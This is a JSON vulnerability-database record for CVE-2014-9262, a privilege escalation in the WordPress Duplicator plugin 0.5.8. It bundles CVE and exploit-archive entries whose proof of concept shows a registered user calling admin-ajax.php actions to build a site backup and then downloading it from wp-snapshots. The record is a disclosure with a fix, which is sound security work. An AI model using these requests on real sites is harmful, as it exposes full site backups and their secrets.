ID WPVDB-ID:7799
Type wpvulndb
Reporter Kacper Szurek
Modified 2015-05-15T00:00:00
Description
WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation
{"id": "WPVDB-ID:7799", "hash": "a7eb67746558f272ac59b7a1f6c16f25", "type": "wpvulndb", "bulletinFamily": "software", "title": "Duplicator 0.5.8 - Privilege Escalation", "description": "WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation\n", "published": "2015-02-19T00:00:00", "modified": "2015-05-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "href": "https://wpvulndb.com/vulnerabilities/7799", "reporter": "Kacper Szurek", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9262", "https://packetstormsecurity.com/files/130439/", "http://security.szurek.pl/duplicator-058-privilege-escalation.html"], "cvelist": ["CVE-2014-9262"], "lastseen": "2019-09-17T03:55:22", "history": [{"bulletin": {"id": "WPVDB-ID:7799", "hash": "211d4c4387fa163cb2460f08fc062082", "type": "wpvulndb", "bulletinFamily": "software", "title": "Duplicator 0.5.8 - Privilege Escalation", "description": "WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation\n", "published": "2015-02-19T00:00:00", "modified": "2015-05-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://wpvulndb.com/vulnerabilities/7799", "reporter": "Kacper Szurek", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9262", "http://packetstormsecurity.com/files/130439/", "http://security.szurek.pl/duplicator-058-privilege-escalation.html"], "cvelist": ["CVE-2014-9262"], "lastseen": "2018-09-17T19:26:27", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-09-17T19:26:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9262"]}, {"type": "zdt", "idList": ["1337DAY-ID-23304"]}, {"type": "exploitdb", "idList": ["EDB-ID:36112"]}], "modified": "2018-09-17T19:26:27"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "duplicator", "version": "0.5.10", "operator": "lt"}]}, "lastseen": "2018-09-17T19:26:27", "differentElements": ["cvss"], "edition": 1}, {"bulletin": {"id": "WPVDB-ID:7799", "hash": "18cf7b2499c4f737b2e1959dc154b80b", "type": "wpvulndb", "bulletinFamily": "software", "title": "Duplicator 0.5.8 - Privilege Escalation", "description": "WordPress Vulnerability - Duplicator 0.5.8 - Privilege Escalation\n", "published": "2015-02-19T00:00:00", "modified": "2015-05-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "href": "https://wpvulndb.com/vulnerabilities/7799", "reporter": "Kacper Szurek", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9262", "http://packetstormsecurity.com/files/130439/", "http://security.szurek.pl/duplicator-058-privilege-escalation.html"], "cvelist": ["CVE-2014-9262"], "lastseen": "2019-05-29T14:32:14", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-05-29T14:32:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9262"]}, {"type": "zdt", "idList": ["1337DAY-ID-23304"]}, {"type": "exploitdb", "idList": ["EDB-ID:36112"]}], "modified": "2019-05-29T14:32:14"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "duplicator", "version": "0.5.10", "operator": "lt"}]}, "lastseen": "2019-05-29T14:32:14", "differentElements": ["references"], "edition": 2}], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-17T03:55:22"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9262"]}, {"type": "zdt", "idList": ["1337DAY-ID-23304"]}, {"type": "exploitdb", "idList": ["EDB-ID:36112"]}], "modified": "2019-09-17T03:55:22"}, "vulnersScore": 5.4}, "objectVersion": "1.4", "affectedSoftware": [{"name": "duplicator", "version": "0.5.10", "operator": "lt"}], "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.wpvulndb.WPVulnDBBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:50", "bulletinFamily": "NVD", "description": "The Duplicator plugin in Wordpress before 0.5.10 allows remote authenticated users to create and download backup files.", "modified": "2017-08-15T16:48:00", "id": "CVE-2014-9262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9262", "published": "2017-08-07T17:29:00", "title": "CVE-2014-9262", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "zdt": [{"lastseen": "2018-01-04T07:08:26", "bulletinFamily": "exploit", "description": "WordPress Duplicator plugin version 0.5.8 suffers from a backup related vulnerability that allows for privilege escalation.", "modified": "2015-02-18T00:00:00", "published": "2015-02-18T00:00:00", "id": "1337DAY-ID-23304", "href": "https://0day.today/exploit/description/23304", "type": "zdt", "title": "WordPress Duplicator 0.5.8 Privilege Escalation Vulnerability", "sourceData": "# Exploit Title: Duplicator 0.5.8 Privilege Escalation\r\n# Date: 21-11-2014\r\n# Software Link: https://wordpress.org/plugins/duplicator/\r\n# Exploit Author: Kacper Szurek\r\n# Contact: http://twitter.com/KacperSzurek\r\n# Website: http://security.szurek.pl/\r\n# Category: webapps\r\n# CVE: CVE-2014-9262\r\n\r\n1. Description\r\n \r\nEvery registered user can create and download backup files.\r\n\r\nFile: duplicator\\duplicator.php\r\nadd_action('wp_ajax_duplicator_package_scan',\t\t'duplicator_package_scan');\r\nadd_action('wp_ajax_duplicator_package_build',\t\t'duplicator_package_build');\r\nadd_action('wp_ajax_duplicator_package_delete',\t\t'duplicator_package_delete');\r\nadd_action('wp_ajax_duplicator_package_report',\t\t'duplicator_package_report');\r\n\r\nhttp://security.szurek.pl/duplicator-058-privilege-escalation.html\r\n\r\n2. Proof of Concept\r\n\r\nLogin as regular user (created using wp-login.php?action=register) then start scan:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan\r\n\r\nAfter that you can build backup:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build\r\n\r\nThis function will return json with backup name inside File key.\r\n\r\nYou can download backup using:\r\n\r\nhttp://wordpress-url/wp-snapshots/%file_name_from_json%\r\n\r\n3. Solution:\r\n \r\nUpdate to version 0.5.10\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/23304"}], "exploitdb": [{"lastseen": "2016-02-04T02:46:40", "bulletinFamily": "exploit", "description": "Duplicator 0.5.8 - Privilege Escalation. CVE-2014-9262. Webapps exploit for php platform", "modified": "2015-02-18T00:00:00", "published": "2015-02-18T00:00:00", "id": "EDB-ID:36112", "href": "https://www.exploit-db.com/exploits/36112/", "type": "exploitdb", "title": "Duplicator 0.5.8 - Privilege Escalation", "sourceData": "# Exploit Title: Duplicator 0.5.8 Privilege Escalation\r\n# Date: 21-11-2014\r\n# Software Link: https://wordpress.org/plugins/duplicator/\r\n# Exploit Author: Kacper Szurek\r\n# Contact: http://twitter.com/KacperSzurek\r\n# Website: http://security.szurek.pl/\r\n# Category: webapps\r\n\r\n1. Description\r\n \r\nEvery registered user can create and download backup files.\r\n\r\nFile: duplicator\\duplicator.php\r\nadd_action('wp_ajax_duplicator_package_scan',\t\t'duplicator_package_scan');\r\nadd_action('wp_ajax_duplicator_package_build',\t\t'duplicator_package_build');\r\nadd_action('wp_ajax_duplicator_package_delete',\t\t'duplicator_package_delete');\r\nadd_action('wp_ajax_duplicator_package_report',\t\t'duplicator_package_report');\r\n\r\nhttp://security.szurek.pl/duplicator-058-privilege-escalation.html\r\n\r\n2. Proof of Concept\r\n\r\nLogin as regular user (created using wp-login.php?action=register) then start scan:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan\r\n\r\nAfter that you can build backup:\r\n\r\nhttp://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build\r\n\r\nThis function will return json with backup name inside File key.\r\n\r\nYou can download backup using:\r\n\r\nhttp://wordpress-url/wp-snapshots/%file_name_from_json%\r\n\r\n3. Solution:\r\n \r\nUpdate to version 0.5.10", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/36112/"}]}